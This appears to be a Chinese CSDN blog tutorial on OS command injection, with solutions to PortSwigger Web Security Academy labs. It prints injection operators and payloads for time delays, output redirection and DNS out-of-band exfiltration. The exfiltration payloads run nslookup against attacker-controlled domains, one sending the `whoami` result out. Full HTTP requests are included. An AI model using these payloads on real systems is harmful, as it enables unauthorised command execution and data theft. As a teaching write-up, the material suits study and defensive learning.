WEB安全基础入门—操作系统命令注入(shell 注入)_文件参数 shell 命令注入

于 2024-05-03 13:34:21 发布
阅读量619 收藏 15
点赞数 14
分类专栏: 程序员 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84184567/article/details/138414713
版权

这个命令就算存在的命令注入漏洞,但是在用户web端不会有任何回显。
但我们可以尝试以下方式进行测试漏洞是否存在

利用时间延迟测试漏洞存在

& ping -c 10 127.0.0.1 &
系统若存在漏洞,将会发起10次ping命令,导致响应时间延迟。

例题2

利用输出重定向来获取结果

& whoami > /var/www/static/whoami.txt &
若命令执行成功,命令执行结果将会写入路径下的whoami.txt文件中。若能成功读取该文件,就能获取结果。

例题3

利用带外技术(OAST)获取结果

& nslookup kgji2ohoyw.web-attacker.com &
& nslookup whoami.kgji2ohoyw.web-attacker.com &
使用命令nslookup来发起DNS对特定域名(攻击者控制的域名)的查询。通过查询访问记录获取结果

例题4、5

5. 常用注入操作符

window与类linux系统通用
  • &
  • &&
  • |
  • ||
类linux专用
  • 0x0a or \n (换新行)
类linux行内命令执行
  • command
  • $(command)

注意:命令注入要注意是否有引号等包裹,注意闭合后溢出,命令才能执行

6. 漏洞实例

1. 操作系统命令注入,简单案例 (OS command injection, simple case
  • 目标

在查看库存量功能处存在命令执行漏洞。执行whoami命令回显当前用户

  • 解题详情

productId=1&storeId=1|ps%20-ef
productId=1&storeId=1|whoami
productId=1&storeId=1;whoami

2. 带有时延的操作系统命令盲注入 (Blind OS command injection with time delays
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,执行盲注导致10s延迟

  • 解题详情

name=fssa&email=123%40123.com||ping%20-c%2010%20192.168.1.1||&subject=13&message=adfs
name=fssa&email=123%40123.com;ping%20-c%2010%20192.168.1.1;&subject=13&message=adfs

3. 带有输出重定向的盲注操作系统命令注入(Blind OS command injection with output redirection
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,执行whoami命令,将结果输出重定向到/var/www/images/,获取结果。

  • 解题详情
POST /feedback/submit HTTP/1.1
Host: ac7f1f491f106b8fc08829fc00b50011.web-security-academy.net

csrf=f29VvEikq8kD255HWZvBLeu18JAX33Ei&name=1&email=123%40123.com||whoami%20>%20/var/www/images/result.txt||&subject=123&message=hello


GET /image?filename=result.txt HTTP/1.1
Host: ac7f1f491f106b8fc08829fc00b50011.web-security-academy.net
Cookie: session=TekRg9mt7CtTUqeyrHh8toH3lyZiUXTu
4. 带外交互的盲注操作系统命令注入 (Blind OS command injection with out-of-band interaction
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,利用Burp Collaborator执行DNS lookup命令

  • 解题详情
POST /feedback/submit HTTP/1.1
Host: acc91f7c1e635f04c0c01cc100fa0054.web-security-academy.net                 

csrf=hLmRCnMINZA3RlaRBGIx6djbKV0t5911&name=2&email=123%40123.com||nslookup%20xxy8f3kz49690drczkiwx10zbqhg55.burpcollaborator.net||&subject=2&message=hello
5. 带外数据外泄的盲注操作系统命令注入(Blind OS command injection with out-of-band data exfiltration
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,利用OAST技术获取当前用户名信息并提交。

  • 解题详情
POST /feedback/submit HTTP/1.1
Host: aca51fa91ec5cbaec0d2294d00f300a8.web-security-academy.net

csrf=mJQ6zYNSkbeEGecCkoqfLemDT8pQeklX&name=3&email=123%40123.com||nslookup%20`whoami`.okcz2u7qr0t0n4e3mb5nksnqyh48sx.burpcollaborator.net||&subject=3&message=hello

在这里插入图片描述

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

需要这份系统化资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84184567
关注
  • 14
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
通过以上题目的练习,学习者可以深入理解Web安全的常见漏洞,如SQL注入、XSS、CSRF、文件包含、权限绕过等,并掌握相应的防御和利用策略。此外,题目还锻炼了选手的逻辑思维、逆向工程和数据分析能力,对于提升Web...
java开源包11
06-28
Blister是一个用于操作苹果二进制PList文件格式的Java开源类库(可用于发送数据给iOS应用程序)。 重复文件检查工具 FindDup.tar FindDup 是一个简单易用的工具,用来检查计算机上重复的文件。 OpenID的Java客户端...
大数据入门系列 1:全网最全,Windows 安装 VMware Workstation 虚拟机完整步骤及需要注意的问题
白鹿第一帅的 CSDN 博客
12-10 9507
学习大数据,就必须要有一台 Unix 或者 Linux 系统的电脑,苹果电脑首选就是最佳的选择,如果条件不支持,在 Windows 电脑上安装虚拟机 VMware Workstation,再在 VMware 里面安装 Linux 系统也是一种不错的选择,下面白鹿为大家奉上在 Windows 上安装 VMware 虚拟机完整步骤及在 VMware 虚拟机上安装 Ubuntu18.04.3 优麒麟版完整步骤。
VMware Workstation Pro 15安装和Win 10虚拟机安装
FYR1018的博客
12-31 5517
VMware Workstation Pro 15安装和Win 10虚拟机安装
百度翻译申请KEY和ID
大白的Java之旅
07-19 3212
给工具添加百度翻译设置KEY和ID
VMware Workstation 的安装
menergy
06-26 1490
VMware Workstation 是一个虚拟PC的软件,利用VMware工作站,可以在现有的操作系统上虚拟出一个或多个新的硬件环境,相当于模拟出多台新的PC,以此来实现在一台机器上同时运行多个独立的操作系统。 VMware 是一种常用的、功能强大的虚拟机管理软件,还有一种比较常用的轻量级的虚拟机管理软件VirtualBox。 VMware Workstation 是一种虚拟机管理软件,安装该软件后,可以创建多个虚拟机(即虚拟PC),然后在虚拟机上安装操作系统即可,每台虚拟机本身就像一台真正地电脑一样
Linux系统的安装及常用命令使用 培训 导师 入门 进阶
03-09
安全测试方面,理解OWASP TOP 10安全漏洞是关键,包括SQL注入、跨站脚本攻击、不安全的直接对象引用等,这需要配合使用如Selenium进行Web应用自动化测试,LoadRunner进行性能测试,以及进行渗透测试以确保系统的...
JAVA上百实例源码以及开源项目
01-03
6个目标文件,EJB来模拟银行ATM机的流程及操作:获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用...
SSH学习笔记SSH
07-26
2. **安装与配置**:在不同的操作系统上(如Ubuntu、CentOS等)安装SSH服务器软件(如OpenSSH),并配置SSH服务,包括修改配置文件`sshd_config`,设置端口、限制用户访问等。 3. **连接与身份验证**:学习如何使用...
百度翻译改版之后搞出来的一个简单的安卓DEMO填下APIkey和密钥就可以使用密钥和key要自己去百度翻译申请.zip
07-30
百度翻译改版之后搞出来的一个简单的安卓DEMO填下APIkey和密钥就可以使用密钥和key要自己去百度翻译申请.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
5G QoS和DNN以及网络切片技术
Mr. David 专栏
12-24 2万+
面向行业多样化应用场景需求,兴通讯深入剖析5G关键技术特性,提出有针对性的5G技术选型方案,帮助运营商合理利用网络资源和降低成本, 为行业客户提供量身订制的网络服务。 典型5G“切片”技术介绍 基于对行业需求的深入挖掘和业务理解,兴通讯提供三大主流“切片”技术(5G QoS,DNN以及真正意义上的网络切片)来承载行业应用,满足差异化业务需求。在进行场景化匹配之前,我们首先需要了解这三种“切片”的技术特征。 1.5G QoS QoS(Quality of Service,服务质量)指一个网络能
VMware Workstation17安装教程及安装Ubuntu22.04系统
最新发布
m0_62627216的博客
01-13 3784
本文介绍了详细的Vmware Workstation Pro的安装教程以及Ubuntu虚拟机的安装配置
Win系统VMware虚拟机安装配置(二)
PAP
10-20 1978
Win系统VMware虚拟机安装配置(二)
VMware Workstation下载及安装
热门推荐
weixin_44200996的博客
12-03 5万+
VMware Workstation下载及安装
HDFS常用命令
m0_56602092的博客
09-05 4816
正则匹配OriginalFilePath目录下的文件(夹),批量上传到hdfs的targetFilePath目录下。其-E表示告诉grep后面是一个正则表达式。查看yarn集群正在运行的应用,可以看到各个应用的执行状态和进度(progress可能不准确,一直为10%)查看所有处于running状态的节点。查看指定目录下所有文件的大小。查看目录下每一个文件夹的大小。根据应用id强行终止指定应用。查看指定目录下的文件。直接查看gz文件内容。
VM虚拟机安装
cyj1261009240的博客
08-30 9092
虚拟机安装创建配置
Win 11 上在VMware 15安装时Ubuntu20.04注意事项(避坑必看)
大罗山下瓯江畔的博客
04-12 1614
VMware Workstation 15&16 Pro 安装避坑合集
Web安全:深入解析命令注入漏洞
命令注入是一种网络安全问题,其基本原理在于攻击者能够通过操纵Web应用的输入字段,注入恶意命令,导致系统执行非预期的操作。这种攻击方式通常发生在应用程序设计时未能对用户输入进行充分验证和过滤的情况下。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值